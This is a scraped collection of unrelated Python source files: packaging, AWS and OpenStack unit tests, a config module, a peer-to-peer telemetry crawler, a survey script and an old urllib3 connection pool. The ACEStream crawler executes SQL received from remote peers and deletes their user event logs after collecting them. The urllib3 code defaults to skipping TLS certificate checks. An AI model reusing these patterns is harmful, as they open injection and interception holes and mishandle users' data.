tests_require = ['nose', 'unittest2', 'pycrypto']
rsa_require = ['pycrypto']
requires = []
setup(
name='oauthlib',
version='0.3.0',
description='A generic, spec-compliant, thorough implementation of the OAuth request-signing logic',
long_description=fread('README.rst'),
author='Idan Gazit',
author_email='idan@gazit.me',
url='https://github.com/idan/oauthlib',
license=fread('LICENSE'),
packages=find_packages(exclude=('docs')),
test_suite='nose.collector',
tests_require=tests_require,
extras_require={'test': tests_require, 'rsa': rsa_require},
install_requires=requires,
)
|
{
"content_hash": "97d717420fe9d80d2ddb717f6850fb02",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 104,
"avg_line_length": 26.56756756756757,
"alnum_prop": 0.6744659206510681,
"repo_name": "gautamk/oauthlib",
"id": "f9013c029a78cedaa1dd393672e361cd8a347d75",
"size": "1008",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "207964"
}
],
"symlink_target": ""
}
|
from chalice.config import Config
from chalice.policy import PolicyBuilder, AppPolicyGenerator
from chalice.policy import diff_policies
from chalice.utils import OSUtils # noqa
class OsUtilsMock(OSUtils):
def file_exists(self, *args, **kwargs):
return True
def get_file_contents(selfs, *args, **kwargs):
return ''
def iam_policy(client_calls):
builder = PolicyBuilder()
policy = builder.build_policy_from_api_calls(client_calls)
return policy
def test_app_policy_generator_vpc_policy():
config = Config.create(
subnet_ids=['sn1', 'sn2'],
security_group_ids=['sg1', 'sg2'],
project_dir='.'
)
generator = AppPolicyGenerator(OsUtilsMock())
policy = generator.generate_policy(config)
assert policy == {'Statement': [
{'Action': ['logs:CreateLogGroup',
'logs:CreateLogStream',
'logs:PutLogEvents'],
'Effect': 'Allow',
'Resource': 'arn:aws:logs:*:*:*'},
{'Action': ['ec2:CreateNetworkInterface',
'ec2:DescribeNetworkInterfaces',
'ec2:DetachNetworkInterface',
'ec2:DeleteNetworkInterface'],
'Effect': 'Allow',
'Resource': '*'},
], 'Version': '2012-10-17'}
def assert_policy_is(actual, expected):
# Prune out the autogen's stuff we don't
# care about.
statements = actual['Statement']
for s in statements:
del s['Sid']
assert expected == statements
def test_single_call():
assert_policy_is(iam_policy({'dynamodb': set(['list_tables'])}), [{
'Effect': 'Allow',
'Action': [
'dynamodb:ListTables'
],
'Resource': [
'*',
]
}])
def test_multiple_calls_in_same_service():
expected_policy = [{
'Effect': 'Allow',
'Action': [
'dynamodb:DescribeTable',
'dynamodb:ListTables',
],
'Resource': [
'*',
]
}]
assert_policy_is(
iam_policy({'dynamodb': set(['list_tables', 'describe_table'])}),
expected_policy
)
def test_multiple_services_used():
client_calls = {
'dynamodb': set(['list_tables']),
'cloudformation': set(['create_stack']),
}
assert_policy_is(iam_policy(client_calls), [
{
'Effect': 'Allow',
'Action': [
'cloudformation:CreateStack',
],
'Resource': [
'*',
]
},
{
'Effect': 'Allow',
'Action': [
'dynamodb:ListTables',
],
'Resource': [
'*',
]
},
])
def test_not_one_to_one_mapping():
client_calls = {
's3': set(['list_buckets', 'list_objects',
'create_multipart_upload']),
}
assert_policy_is(iam_policy(client_calls), [
{
'Effect': 'Allow',
'Action': [
's3:ListAllMyBuckets',
's3:ListBucket',
's3:PutObject',
],
'Resource': [
'*',
]
},
])
def test_can_diff_policy_removed():
first = iam_policy({'s3': {'list_buckets', 'list_objects'}})
second = iam_policy({'s3': {'list_buckets'}})
assert diff_policies(first, second) == {'removed': {'s3:ListBucket'}}
def test_can_diff_policy_added():
first = iam_policy({'s3': {'list_buckets'}})
second = iam_policy({'s3': {'list_buckets', 'list_objects'}})
assert diff_policies(first, second) == {'added': {'s3:ListBucket'}}
def test_can_diff_multiple_services():
first = iam_policy({
's3': {'list_buckets'},
'dynamodb': {'create_table'},
'cloudformation': {'create_stack', 'delete_stack'},
})
second = iam_policy({
's3': {'list_buckets', 'list_objects'},
'cloudformation': {'create_stack', 'update_stack'},
})
assert diff_policies(first, second) == {
'added': {'s3:ListBucket', 'cloudformation:UpdateStack'},
'removed': {'cloudformation:DeleteStack', 'dynamodb:CreateTable'},
}
def test_no_changes():
first = iam_policy({'s3': {'list_buckets', 'list_objects'}})
second = iam_policy({'s3': {'list_buckets', 'list_objects'}})
assert diff_policies(first, second) == {}
def test_can_handle_high_level_abstractions():
policy = iam_policy({
's3': set(['download_file', 'upload_file', 'copy'])
})
assert_policy_is(policy, [{
'Effect': 'Allow',
'Action': [
's3:AbortMultipartUpload',
's3:GetObject',
's3:PutObject',
],
'Resource': [
'*',
]
}])
def test_noop_for_unknown_methods():
assert_policy_is(iam_policy({'s3': set(['unknown_method'])}), [])
|
{
"content_hash": "08ecdbafaa56732813acbce50ac5015d",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 74,
"avg_line_length": 27.07734806629834,
"alnum_prop": 0.5207100591715976,
"repo_name": "awslabs/chalice",
"id": "b0c3d54f15e7edb2573c94ba7dd16cfb2d651e2c",
"size": "4901",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/test_policy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1407"
},
{
"name": "Python",
"bytes": "588372"
}
],
"symlink_target": ""
}
|
from rally import consts
from rally import objects
from tests.unit import test
class EndpointTestCase(test.TestCase):
def test_to_dict(self):
endpoint = objects.Endpoint("foo_url", "foo_user", "foo_password",
tenant_name="foo_tenant",
permission=consts.EndpointPermission.ADMIN)
self.assertEqual(endpoint.to_dict(),
{"auth_url": "foo_url",
"username": "foo_user",
"password": "foo_password",
"tenant_name": "foo_tenant",
"region_name": None,
"domain_name": None,
"endpoint": None,
"endpoint_type": consts.EndpointType.PUBLIC,
"https_insecure": None,
"https_cacert": None,
"project_domain_name": "Default",
"user_domain_name": "Default",
"admin_domain_name": "Default"})
def test_to_dict_with_include_permission(self):
endpoint = objects.Endpoint("foo_url", "foo_user", "foo_password",
tenant_name="foo_tenant",
permission=consts.EndpointPermission.ADMIN)
self.assertEqual(endpoint.to_dict(include_permission=True),
{"auth_url": "foo_url",
"username": "foo_user",
"password": "foo_password",
"tenant_name": "foo_tenant",
"region_name": None,
"domain_name": None,
"endpoint": None,
"permission": consts.EndpointPermission.ADMIN,
"endpoint_type": consts.EndpointType.PUBLIC,
"https_insecure": None,
"https_cacert": None,
"project_domain_name": "Default",
"user_domain_name": "Default",
"admin_domain_name": "Default"})
def test_to_dict_with_kwarg_endpoint(self):
endpoint = objects.Endpoint("foo_url", "foo_user", "foo_password",
tenant_name="foo_tenant",
permission=consts.EndpointPermission.ADMIN,
endpoint="foo_endpoint")
self.assertEqual(endpoint.to_dict(),
{"auth_url": "foo_url",
"username": "foo_user",
"password": "foo_password",
"tenant_name": "foo_tenant",
"region_name": None,
"domain_name": None,
"endpoint": "foo_endpoint",
"endpoint_type": consts.EndpointType.PUBLIC,
"https_insecure": None,
"https_cacert": None,
"project_domain_name": "Default",
"user_domain_name": "Default",
"admin_domain_name": "Default"})
|
{
"content_hash": "9514b5429c11e4df6ecc68d5e88cdf66",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 79,
"avg_line_length": 50.41538461538462,
"alnum_prop": 0.42691486115349403,
"repo_name": "shdowofdeath/rally",
"id": "b2c929baee58b6885976339453001b199a6b0997",
"size": "3907",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/unit/objects/test_endpoint.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "46737"
},
{
"name": "Python",
"bytes": "2421750"
},
{
"name": "Shell",
"bytes": "36795"
}
],
"symlink_target": ""
}
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"""
import logging
import uuid
import os
__author__ = 'Fernando Serena'
def _api_port():
return int(os.environ.get('API_PORT', 5007))
def _agent_id():
aid = os.environ.get('AGENT_ID')
if not aid:
try:
with file('.AGENT_ID', mode='r') as f:
aid = f.readline()
except IOError:
pass
if not aid:
aid = str(uuid.uuid4())
with file('.AGENT_ID', mode='w') as f:
f.write(aid)
return aid
def _redis_conf(def_host, def_port, def_db):
return {'host': os.environ.get('DB_HOST', def_host),
'db': int(os.environ.get('DB_DB', def_db)),
'port': int(os.environ.get('DB_PORT', def_port))}
def _mongo_conf(def_host, def_port, def_db):
return {'host': os.environ.get('MONGO_HOST', def_host),
'db': os.environ.get('MONGO_DB', def_db),
'port': int(os.environ.get('MONGO_PORT', def_port))}
def _agora_conf(def_host, def_port):
return {'host': os.environ.get('AGORA_HOST', def_host),
'port': int(os.environ.get('AGORA_PORT', def_port))}
def _broker_conf(def_host, def_port):
return {'host': os.environ.get('AMQP_HOST', def_host),
'port': int(os.environ.get('AMQP_PORT', def_port))}
def _exchange_conf(def_exchange, def_queue, def_tp, def_response_rk):
return {
'exchange': os.environ.get('EXCHANGE_NAME', def_exchange),
'queue': os.environ.get('QUEUE_NAME', def_queue),
'topic_pattern': os.environ.get('TOPIC_PATTERN', def_tp),
'response_rk': os.environ.get('RESPONSE_RK_PREFIX', def_response_rk)
}
def _behaviour_conf(def_pass_threshold):
return {
'pass_threshold': float(os.environ.get('PASS_THRESHOLD', def_pass_threshold))
}
def _cache_conf(def_graph_throttling, def_min_cache_time):
return {
'graph_throttling': float(os.environ.get('GRAPH_THROTTLING', def_graph_throttling)),
'min_cache_time': float(os.environ.get('MIN_CACHE_TIME', def_min_cache_time))
}
def _logging_conf(def_level):
return int(os.environ.get('LOG_LEVEL', def_level))
class Config(object):
PORT = _api_port()
REDIS = _redis_conf('localhost', 6379, 4)
MONGO = _mongo_conf('localhost', 27017, 'scholar')
AGORA = _agora_conf('localhost', 9002)
BROKER = _broker_conf('localhost', 5672)
EXCHANGE = _exchange_conf('stoa', 'stoa_requests', 'stoa.request.*', 'stoa.response')
BEHAVIOUR = _behaviour_conf(0.1)
CACHE = _cache_conf(20, 60)
ID = _agent_id()
class DevelopmentConfig(Config):
DEBUG = True
LOG = logging.DEBUG
class TestingConfig(Config):
DEBUG = False
LOG = logging.DEBUG
TESTING = True
class ProductionConfig(Config):
DEBUG = False
LOG = _logging_conf(logging.INFO)
|
{
"content_hash": "072812b6be05658a0b44ab7fd239dba9",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 92,
"avg_line_length": 31.193548387096776,
"alnum_prop": 0.5855739400206825,
"repo_name": "fserena/agora-stoa",
"id": "4ded2bfd5eadc82bda23b4ee5611f9f725eddcae",
"size": "3868",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "agora/stoa/server/config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "121135"
}
],
"symlink_target": ""
}
|
from oslo_utils import uuidutils
from ironic.common import network
from ironic.conductor import task_manager
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as object_utils
class TestNetwork(db_base.DbTestCase):
def setUp(self):
super(TestNetwork, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake')
self.node = object_utils.create_test_node(self.context)
def test_get_node_vif_ids_no_ports_no_portgroups(self):
expected = {'portgroups': {},
'ports': {}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
def test_get_node_vif_ids_one_port(self):
port1 = db_utils.create_test_port(node_id=self.node.id,
address='aa:bb:cc:dd:ee:ff',
uuid=uuidutils.generate_uuid(),
extra={'vif_port_id': 'test-vif-A'},
driver='fake')
expected = {'portgroups': {},
'ports': {port1.uuid: 'test-vif-A'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
def test_get_node_vif_ids_one_portgroup(self):
pg1 = db_utils.create_test_portgroup(
node_id=self.node.id,
extra={'vif_port_id': 'test-vif-A'})
expected = {'portgroups': {pg1.uuid: 'test-vif-A'},
'ports': {}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
def test_get_node_vif_ids_two_ports(self):
port1 = db_utils.create_test_port(node_id=self.node.id,
address='aa:bb:cc:dd:ee:ff',
uuid=uuidutils.generate_uuid(),
extra={'vif_port_id': 'test-vif-A'},
driver='fake')
port2 = db_utils.create_test_port(node_id=self.node.id,
address='dd:ee:ff:aa:bb:cc',
uuid=uuidutils.generate_uuid(),
extra={'vif_port_id': 'test-vif-B'},
driver='fake')
expected = {'portgroups': {},
'ports': {port1.uuid: 'test-vif-A',
port2.uuid: 'test-vif-B'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
def test_get_node_vif_ids_two_portgroups(self):
pg1 = db_utils.create_test_portgroup(
node_id=self.node.id,
extra={'vif_port_id': 'test-vif-A'})
pg2 = db_utils.create_test_portgroup(
uuid=uuidutils.generate_uuid(),
address='dd:ee:ff:aa:bb:cc',
node_id=self.node.id,
name='barname',
extra={'vif_port_id': 'test-vif-B'})
expected = {'portgroups': {pg1.uuid: 'test-vif-A',
pg2.uuid: 'test-vif-B'},
'ports': {}}
with task_manager.acquire(self.context, self.node.uuid) as task:
result = network.get_node_vif_ids(task)
self.assertEqual(expected, result)
|
{
"content_hash": "280133561a917e9b26b33f2d6c0074f9",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 78,
"avg_line_length": 46.25925925925926,
"alnum_prop": 0.525487056311716,
"repo_name": "devananda/ironic",
"id": "8a318f2b86357840a99af78eaee20c03c9b34b44",
"size": "4376",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "ironic/tests/unit/common/test_network.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "3354566"
}
],
"symlink_target": ""
}
|
import sys
import cPickle
from time import strftime
from ACEStream.Core.Overlay.SecureOverlay import OLPROTO_VER_FIFTEENTH
from ACEStream.Core.BitTornado.BT1.MessageID import CRAWLER_USEREVENTLOG_QUERY
from ACEStream.Core.CacheDB.sqlitecachedb import SQLiteCacheDB
from ACEStream.Core.Utilities.utilities import show_permid, show_permid_short
from ACEStream.Core.Statistics.Crawler import Crawler
DEBUG = False
class UserEventLogCrawler:
__single = None
@classmethod
def get_instance(cls, *args, **kargs):
if not cls.__single:
cls.__single = cls(*args, **kargs)
return cls.__single
def __init__(self):
self._sqlite_cache_db = SQLiteCacheDB.getInstance()
crawler = Crawler.get_instance()
if crawler.am_crawler():
msg = '# Crawler started'
self.__log(msg)
def query_initiator(self, permid, selversion, request_callback):
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: query_initiator', show_permid_short(permid)
if selversion >= OLPROTO_VER_FIFTEENTH:
sql = 'SELECT * FROM UserEventLog; DELETE FROM UserEventLog;'
request_callback(CRAWLER_USEREVENTLOG_QUERY, sql, callback=self._after_request_callback)
def _after_request_callback(self, exc, permid):
if not exc:
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: request send to', show_permid_short(permid)
msg = '; '.join(['REQUEST', show_permid(permid)])
self.__log(msg)
def handle_crawler_request(self, permid, selversion, channel_id, message, reply_callback):
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: handle_crawler_request', show_permid_short(permid), message
try:
cursor = self._sqlite_cache_db.execute_read(message)
except Exception as e:
reply_callback(str(e), error=1)
else:
if cursor:
reply_callback(cPickle.dumps(list(cursor), 2))
else:
reply_callback('error', error=2)
def handle_crawler_reply(self, permid, selversion, channel_id, channel_data, error, message, request_callback):
if error:
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: handle_crawler_reply', error, message
msg = '; '.join(['REPLY',
show_permid(permid),
str(error),
str(message)])
self.__log(msg)
else:
if DEBUG:
print >> sys.stderr, 'usereventlogcrawler: handle_crawler_reply', show_permid_short(permid), cPickle.loads(message)
msg = '; '.join(['REPLY',
show_permid(permid),
str(error),
str(cPickle.loads(message))])
self.__log(msg)
def __log(self, message):
file = open('usereventlogcrawler' + strftime('%Y-%m-%d') + '.txt', 'a')
print >> file, strftime('%Y/%m/%d %H:%M:%S'), message
file.close()
|
{
"content_hash": "ab1cf148acb7ba52d1f1760b1ef4816f",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 131,
"avg_line_length": 40.44,
"alnum_prop": 0.6079788987800857,
"repo_name": "aplicatii-romanesti/allinclusive-kodi-pi",
"id": "390e611b6241e13656d449ee66625bbc2546fdb2",
"size": "3104",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": ".kodi/userdata/addon_data/plugin.video.p2p-streams/acestream/ace/ACEStream/Core/Statistics/UserEventLogCrawler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "6178"
},
{
"name": "Python",
"bytes": "8657978"
},
{
"name": "Shell",
"bytes": "198"
}
],
"symlink_target": ""
}
|
import msvcrt
#inicio
titulo="Encuesta Deportes\n".capitalize()
print titulo.center(50," ")
entrada= "Clasificacion de deportes que practican las personas\n"
print entrada.upper()
#-------------------------------------------------------------------------------
#pregunta
pregunta=0
c1=1
ajedrez=0
atletismo=0
futbol=0
baloncesto=0
karate=0
natacion=0
volleyball=0
flag=0
pingpong=0
otros=0
while pregunta >1 or pregunta <=10 :
pregunta=pregunta+1
print ("\n?Que deporte usted practica de la siguiente lista?\n ")
print"1) Ajedrez"
print'2) Atletismo'
print'3) Baloncesto '
print"4) Futbol"
print"5) Karate "
print"6) Natacion"
print"7) Volleyball"
print"8) Flag"
print"9) Ping Pong"
print"10) otros"
opcion = int(raw_input('elija opcion: '))
if opcion == 1:
ajedrez=ajedrez+1
print "\najedrez"
elif opcion == 2:
atletismo=atletismo+1
print "\natletismo"
elif opcion == 3:
baloncesto=baloncesto+1
print "\nbaloncesto"
elif opcion == 4:
futbol=futbol+1
print "\nfutbol"
elif opcion == 5:
karate=karate+1
print "\nkarate"
elif opcion == 6:
natacion=natacion+1
print "\nnatacion"
elif opcion == 7:
volleyball=volleyball+1
print "\nvolleybol"
elif opcion == 8:
flag=flag+1
print "\nflag"
elif opcion == 9:
pingpong=pingpong+1
print "\nping pong"
elif opcion==10:
otros=otros+1
print"\notros"
else:
print"\nelija opciones establecidas"
if pregunta >=10:
break
print("\nEl total de encuestado de los diferentes deportes son:\n")
print("ajedrez",ajedrez)
print("atletismo:",atletismo)
print("baloncesto:",baloncesto)
print("futbol:",futbol)
print("karate:",karate)
print("natacion:",natacion)
print("volleyball:",volleyball)
print("flag:",flag)
print("pingpong",pingpong)
print("otros",otros)
msvcrt.getch()
|
{
"content_hash": "59bb5fa4d750d6e7915f1b2af6ca7765",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 80,
"avg_line_length": 18.117117117117118,
"alnum_prop": 0.599204375932372,
"repo_name": "rubbenrc/uip-prog3",
"id": "cbff876e5df80b212b146c0b7eb0f64595430f44",
"size": "2827",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tarea/tarea#6 encuesta mejorada.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23644"
}
],
"symlink_target": ""
}
|
import logging
import socket
from httplib import HTTPConnection, HTTPSConnection, HTTPException
from Queue import Queue, Empty, Full
from select import select
from socket import error as SocketError, timeout as SocketTimeout
from .packages.ssl_match_hostname import match_hostname, CertificateError
try:
import ssl
BaseSSLError = ssl.SSLError
except ImportError:
ssl = None
BaseSSLError = None
from .request import RequestMethods
from .response import HTTPResponse
from .exceptions import (
SSLError,
MaxRetryError,
TimeoutError,
HostChangedError,
EmptyPoolError,
)
log = logging.getLogger(__name__)
_Default = object()
## Connection objects (extension of httplib)
class VerifiedHTTPSConnection(HTTPSConnection):
"""
Based on httplib.HTTPSConnection but wraps the socket with
SSL certification.
"""
cert_reqs = None
ca_certs = None
def set_cert(self, key_file=None, cert_file=None,
cert_reqs='CERT_NONE', ca_certs=None):
ssl_req_scheme = {
'CERT_NONE': ssl.CERT_NONE,
'CERT_OPTIONAL': ssl.CERT_OPTIONAL,
'CERT_REQUIRED': ssl.CERT_REQUIRED
}
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = ssl_req_scheme.get(cert_reqs) or ssl.CERT_NONE
self.ca_certs = ca_certs
def connect(self):
# Add certificate verification
sock = socket.create_connection((self.host, self.port), self.timeout)
# Wrap socket using verification with the root certs in
# trusted_root_certs
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=self.cert_reqs,
ca_certs=self.ca_certs)
if self.ca_certs:
match_hostname(self.sock.getpeercert(), self.host)
## Pool objects
class ConnectionPool(object):
"""
Base class for all connection pools, such as
:class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`.
"""
pass
class HTTPConnectionPool(ConnectionPool, RequestMethods):
"""
Thread-safe connection pool for one host.
:param host:
Host used for this HTTP Connection (e.g. "localhost"), passed into
:class:`httplib.HTTPConnection`.
:param port:
Port used for this HTTP Connection (None is equivalent to 80), passed
into :class:`httplib.HTTPConnection`.
:param strict:
Causes BadStatusLine to be raised if the status line can't be parsed
as a valid HTTP/1.0 or 1.1 status line, passed into
:class:`httplib.HTTPConnection`.
:param timeout:
Socket timeout for each individual connection, can be a float. None
disables timeout.
:param maxsize:
Number of connections to save that can be reused. More than 1 is useful
in multithreaded situations. If ``block`` is set to false, more
connections will be created but they will not be saved once they've
been used.
:param block:
If set to True, no more than ``maxsize`` connections will be used at
a time. When no free connections are available, the call will block
until a connection has been released. This is a useful side effect for
particular multithreaded situations where one does not want to use more
than maxsize connections per host to prevent flooding.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
"""
scheme = 'http'
def __init__(self, host, port=None, strict=False, timeout=None, maxsize=1,
block=False, headers=None):
self.host = host
self.port = port
self.strict = strict
self.timeout = timeout
self.pool = Queue(maxsize)
self.block = block
self.headers = headers or {}
# Fill the queue up so that doing get() on it will block properly
for _ in xrange(maxsize):
self.pool.put(None)
# These are mostly for testing and debugging purposes.
self.num_connections = 0
self.num_requests = 0
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s" %
(self.num_connections, self.host))
return HTTPConnection(host=self.host, port=self.port)
def _get_conn(self, timeout=None):
"""
Get a connection. Will return a pooled connection if one is available.
If no connections are available and :prop:`.block` is ``False``, then a
fresh connection is returned.
:param timeout:
Seconds to wait before giving up and raising
:class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and
:prop:`.block` is ``True``.
"""
conn = None
try:
conn = self.pool.get(block=self.block, timeout=timeout)
# If this is a persistent connection, check if it got disconnected
if conn and conn.sock and select([conn.sock], [], [], 0.0)[0]:
# Either data is buffered (bad), or the connection is dropped.
log.info("Resetting dropped connection: %s" % self.host)
conn.close()
except Empty:
if self.block:
raise EmptyPoolError("Pool reached maximum size and no more "
"connections are allowed.")
pass # Oh well, we'll create a new connection then
return conn or self._new_conn()
def _put_conn(self, conn):
"""
Put a connection back into the pool.
:param conn:
Connection object for the current host and port as returned by
:meth:`._new_conn` or :meth:`._get_conn`.
If the pool is already full, the connection is discarded because we
exceeded maxsize. If connections are discarded frequently, then maxsize
should be increased.
"""
try:
self.pool.put(conn, block=False)
except Full:
# This should never happen if self.block == True
log.warning("HttpConnectionPool is full, discarding connection: %s"
% self.host)
def _make_request(self, conn, method, url, timeout=_Default,
**httplib_request_kw):
"""
Perform a request on a given httplib connection object taken from our
pool.
"""
self.num_requests += 1
if timeout is _Default:
timeout = self.timeout
conn.timeout = timeout # This only does anything in Py26+
conn.request(method, url, **httplib_request_kw)
conn.sock.settimeout(timeout)
httplib_response = conn.getresponse()
log.debug("\"%s %s %s\" %s %s" %
(method, url,
conn._http_vsn_str, # pylint: disable-msg=W0212
httplib_response.status, httplib_response.length))
return httplib_response
def is_same_host(self, url):
"""
Check if the given ``url`` is a member of the same host as this
conncetion pool.
"""
# TODO: Add optional support for socket.gethostbyname checking.
return (url.startswith('/') or
get_host(url) == (self.scheme, self.host, self.port))
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True, timeout=_Default,
pool_timeout=None, release_conn=None, **response_kw):
"""
Get a connection from the pool and perform an HTTP request. This is the
lowest level call for making a request, so you'll need to specify all
the raw details.
.. note::
More commonly, it's appropriate to use a convenience method provided
by :class:`.RequestMethods`, such as :meth:`.request`.
.. note::
`release_conn` will only behave as expected if
`preload_content=False` because we want to make
`preload_content=False` the default behaviour someday soon without
breaking backwards compatibility.
:param method:
HTTP request method (such as GET, POST, PUT, etc.)
:param body:
Data to send in the request body (useful for creating
POST requests, see HTTPConnectionPool.post_url for
more convenience).
:param headers:
Dictionary of custom headers to send, such as User-Agent,
If-None-Match, etc. If None, pool headers are used. If provided,
these headers completely replace any pool-specific headers.
:param retries:
Number of retries to allow before raising a MaxRetryError exception.
:param redirect:
Automatically handle redirects (status codes 301, 302, 303, 307),
each redirect counts as a retry.
:param assert_same_host:
If ``True``, will make sure that the host of the pool requests is
consistent else will raise HostChangedError. When False, you can
use the pool on an HTTP proxy and request foreign hosts.
:param timeout:
If specified, overrides the default timeout for this one request.
:param pool_timeout:
If set and the pool is set to block=True, then this method will
block for ``pool_timeout`` seconds and raise EmptyPoolError if no
connection is available within the time period.
:param release_conn:
If False, then the urlopen call will not release the connection
back into the pool once a response is received (but will release if
you read the entire contents of the response such as when
`preload_content=True`). This is useful if you're not preloading
the response's content immediately. You will need to call
``r.release_conn()`` on the response ``r`` to return the connection
back into the pool. If None, it takes the value of
``response_kw.get('preload_content', True)``.
:param \**response_kw:
Additional parameters are passed to
:meth:`urllib3.response.HTTPResponse.from_httplib`
"""
if headers is None:
headers = self.headers
if retries < 0:
raise MaxRetryError("Max retries exceeded for url: %s" % url)
if timeout is _Default:
timeout = self.timeout
if release_conn is None:
release_conn = response_kw.get('preload_content', True)
# Check host
if assert_same_host and not self.is_same_host(url):
host = "%s://%s" % (self.scheme, self.host)
if self.port:
host = "%s:%d" % (host, self.port)
raise HostChangedError("Connection pool with host '%s' tried to "
"open a foreign host: %s" % (host, url))
conn = None
try:
# Request a connection from the queue
# (Could raise SocketError: Bad file descriptor)
conn = self._get_conn(timeout=pool_timeout)
# Make the request on the httplib connection object
httplib_response = self._make_request(conn, method, url,
timeout=timeout,
body=body, headers=headers)
# If we're going to release the connection in ``finally:``, then
# the request doesn't need to know about the connection. Otherwise
# it will also try to release it and we'll have a double-release
# mess.
response_conn = not release_conn and conn
# Import httplib's response into our own wrapper object
response = HTTPResponse.from_httplib(httplib_response,
pool=self,
connection=response_conn,
**response_kw)
# else:
# The connection will be put back into the pool when
# ``response.release_conn()`` is called (implicitly by
# ``response.read()``)
except (Empty), e:
# Timed out by queue
raise TimeoutError("Request timed out. (pool_timeout=%s)" %
pool_timeout)
except (SocketTimeout), e:
# Timed out by socket
raise TimeoutError("Request timed out. (timeout=%s)" %
timeout)
except (BaseSSLError), e:
# SSL certificate error
raise SSLError(e)
except (CertificateError), e:
# Name mismatch
raise SSLError(e)
except (HTTPException, SocketError), e:
# Connection broken, discard. It will be replaced next _get_conn().
conn = None
finally:
if conn and release_conn:
# Put the connection back to be reused
self._put_conn(conn)
if not conn:
log.warn("Retrying (%d attempts remain) after connection "
"broken by '%r': %s" % (retries, e, url))
return self.urlopen(method, url, body, headers, retries - 1,
redirect, assert_same_host) # Try again
# Handle redirection
if (redirect and
response.status in [301, 302, 303, 307] and
'location' in response.headers): # Redirect, retry
log.info("Redirecting %s -> %s" %
(url, response.headers.get('location')))
return self.urlopen(method, response.headers.get('location'), body,
headers, retries - 1, redirect,
assert_same_host)
return response
class HTTPSConnectionPool(HTTPConnectionPool):
"""
Same as :class:`.HTTPConnectionPool`, but HTTPS.
When Python is compiled with the :mod:`ssl` module, then
:class:`.VerifiedHTTPSConnection` is used, which *can* verify certificates,
instead of :class:httplib.HTTPSConnection`.
The ``key_file``, ``cert_file``, ``cert_reqs``, and ``ca_certs`` parameters
are only used if :mod:`ssl` is available and are fed into
:meth:`ssl.wrap_socket` to upgrade the connection socket into an SSL socket.
"""
scheme = 'https'
def __init__(self, host, port=None,
strict=False, timeout=None, maxsize=1,
block=False, headers=None,
key_file=None, cert_file=None,
cert_reqs='CERT_NONE', ca_certs=None):
super(HTTPSConnectionPool, self).__init__(host, port,
strict, timeout, maxsize,
block, headers)
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.ca_certs = ca_certs
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPSConnection`.
"""
